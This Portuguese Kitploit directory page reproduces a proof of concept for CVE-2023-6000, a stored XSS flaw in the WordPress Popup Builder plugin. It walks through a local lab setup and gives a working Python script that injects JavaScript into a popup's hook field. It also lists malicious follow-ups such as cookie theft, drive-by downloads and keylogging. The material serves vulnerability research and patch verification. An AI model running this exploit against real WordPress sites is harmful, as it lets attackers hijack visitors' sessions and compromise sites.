Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-6000-POC — Esta vulnerabilidade exibe uma falha de XSS em um plugin de popup do WordPress, permitindo que atacantes injetem JavaScript malicioso por meio de um XSS armazenado. | Kitploit
Ferramentas/GitHubGitHub/ronf98/cve-2023-6000-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubronf98/cve-2023-6000-poc

CVE-2023-6000-POC

Esta vulnerabilidade exibe uma falha de XSS em um plugin de popup do WordPress, permitindo que atacantes injetem JavaScript malicioso por meio de um XSS armazenado.

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Detalhes Gerais

  • CVE-ID : CVE-2023-6000
  • Pontuação CVSS : 6.1
  • Tipo : XSS Armazenado
  • Versão Corrigida : Popup Builder 4.2.3

Esta vulnerabilidade permite que um atacante explore uma falha de Cross-Site Scripting (XSS) no plugin Popup Builder do WordPress. O plugin não impede que visitantes comuns modifiquem popups existentes e, ao enviar uma requisição especialmente criada para o servidor, o atacante pode injetar scripts maliciosos no popup, que serão executados quando os usuários interagirem com o popup.

Para esta POC, a vulnerabilidade será acionada ao manipular o comportamento de abertura do popup, onde um script simples de alerta será injetado para ser executado quando o popup abrir. Este tipo de ataque pode levar a uma série de problemas, incluindo acesso não autorizado a informações sensíveis e exploração adicional do site afetado, potencialmente comprometendo dados do usuário ou todo o site.

Configuração do Ambiente da POC

  1. Baixe o XAMPP para hospedar o servidor web local (versão mais recente)
  2. Crie um banco de dados SQL
  3. Instale o WordPress (versão mais recente)
  4. Entre no WordPress-admin e instale uma versão vulnerável do Popup Builder (<4.2.3)
  5. Configure uma página inicial simples e um popup para exibir a vulnerabilidade

Passo 1: XAMPP

Para esta POC, podemos usar uma máquina Windows 10 e baixar o XAMPP: https://www.apachefriends.org/download.html
Após a instalação, certifique-se de ativar os módulos Apache e MySQL:

image

Passo 2: Banco de Dados SQL

O WordPress, como a maioria dos sistemas de gerenciamento de conteúdo, requer um banco de dados para armazenar todos os seus dados essenciais. O banco de dados SQL que criaremos atua como o armazenamento central para todas essas informações.

  • No seu navegador, navegue até http://localhost/phpmyadmin
  • Vá para a guia Databases e crie um novo banco de dados (ex.: wordpress_db).
  • Anote o nome do banco de dados, pois você precisará dele durante a configuração do WordPress.

Passo 3: WordPress

  • Baixe o WordPress do site oficial - https://wordpress.org/download/
  • Após o download, extraia o arquivo zip do WordPress para a pasta do diretório de instalação do XAMPP em C:\xampp\htdocs\
  • Em seguida, navegue até http://localhost/wordpress, que exibirá a tela de instalação.
  • No campo nome do banco de dados, insira o nome do banco de dados SQL que criamos, o resto pode permanecer como padrão (usuário:root, senha:vazia (padrão para XAMPP)).
  • Se a conexão com o banco de dados for bem-sucedida, você poderá configurar um usuário Admin para acesso posterior.

Passo 4: Popup Builder

A versão vulnerável do plugin Popup Builder pode ser baixada do site principal: https://wordpress.org/plugins/popup-builder/advanced/
Escolha uma versão anterior à correção na 4.2.3:
image
Em seguida, vá para sua página admin do WordPress - http://localhost/wordpress/wp-login.php
Plugins -> Adicionar Novo Plugin -> Enviar Plugin -> Escolha o arquivo .ZIP baixado e instale

Passo 5: Página Inicial e Popup

Na página WordPress-admin, podemos criar uma página inicial simples indo em Páginas -> Adicionar Nova Página -> Escolher um Padrão.
Para o Popup, vá em Popup Builder -> Adicionar Novo -> Escolher tipo e personalizar.
Para esta POC, selecionei um popup de inscrição, pois é um dos popups mais comuns em sites atualmente.
image

Na guia Regras de Exibição, você pode anexar o popup à sua página inicial:
image

Agora, quando entramos em nossa página inicial usando http://localhost/wordpress/
podemos ver nosso popup sendo acionado.

Exploit

Para executar o exploit, primeiro precisamos identificar o ID do Popup.
Isso pode ser feito navegando até o site, acionando o popup e abrindo a guia Network nas ferramentas do desenvolvedor.
Procure pela requisição admin-ajax.php, um componente central do WordPress usado para tratar requisições AJAX.
O Popup Builder utiliza isso para gerenciar funções como salvar, atualizar, visualizar e controlar popups no WordPress.

Na guia Payload, podemos encontrar o ID do popup:

image

Após encontrar o ID do Popup, podemos usar o seguinte script para acionar o exploit:

root@kitploit:~
import requests

# Define the target URL for the vulnerable site
url = "http://localhost/wordpress/"
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
    }
data = {
    "sgpb-is-preview": "1",
    "post_ID": "22",     #use the Popup ID we found
    "sgpb-type": "html",
    "sgpb-WillOpen": "alert('Stored XSS Executed Successfully');"     #custom JS code goes here
    }

# Send the POST request and output the results
response = requests.post(url, data=data)
print(response.text)

Opções Adicionais

Como podemos editar o popup, também podemos controlar o momento de acionamento do nosso JS personalizado. Se formos para a página WordPress-admin, na configuração do popup podemos ver uma opção "Custom JS or CSS", que controlará o momento do código personalizado:

  • "sgpb-ShouldOpen" : Executa antes do popup começar a abrir, verificando se deve abrir.
  • "sgpb-WillOpen" : Executa logo antes do popup abrir, permitindo ações de último segundo.
  • "sgpb-DidOpen" : Executa logo após o popup ter sido totalmente aberto, ideal para ações pós-carregamento (ex.: XSS).
  • "sgpb-ShouldClose" : Verificações ou ações acionadas antes do popup começar a fechar.
  • "sgpb-WillClose" : Executa logo antes do popup fechar, permitindo alterações finais.
  • "sgpb-DidClose" : Executa imediatamente após o popup ter sido totalmente fechado.

image

Podemos então incorporar isso em nosso script de acordo com o uso desejado.

Execução

Após acionar o script, podemos ver na página WordPress-admin que uma nova linha foi adicionada à seção de JS personalizado do nosso popup:

image

Agora, ao entrar no site como um usuário comum, podemos ver a seguinte mensagem sendo exibida:

image

Também podemos ver que nossa mensagem foi salva no banco de dados SQL (na tabela wp_postmeta por padrão), o que confirma ser um XSS armazenado:

image

Possíveis Usos

Esta vulnerabilidade de XSS armazenado no plugin Popup Builder permite que o atacante incorpore JavaScript malicioso que pode ser executado sempre que um usuário interagir com o popup infectado. A seguir estão maneiras de explorá-lo maliciosamente:

  • Sequestro de Sessão: Código JS malicioso pode roubar cookies de sessão e enviá-los para um domínio externo, permitindo que atacantes assumam contas de usuários.
  • Redirecionamento: O script pode redirecionar usuários para páginas de login falsas ou outros sites maliciosos (isso pode ser feito adicionando o seguinte código JS: window.location.href = 'https://facebook.com')
  • Downloads Drive-by: O atacante pode acionar downloads de arquivos maliciosos, fazendo com que os usuários instalem malware sem saber.
  • Desfiguração e Desinformação: Scripts injetados podem manipular o conteúdo da página, desfigurando o site ou exibindo informações falsas para os usuários.
  • Keylogger: Scripts maliciosos podem ser usados para registrar as teclas digitadas pelo usuário, capturando dados sensíveis e informações pessoais, e então enviá-los para o domínio do atacante.
Baixar ferramenta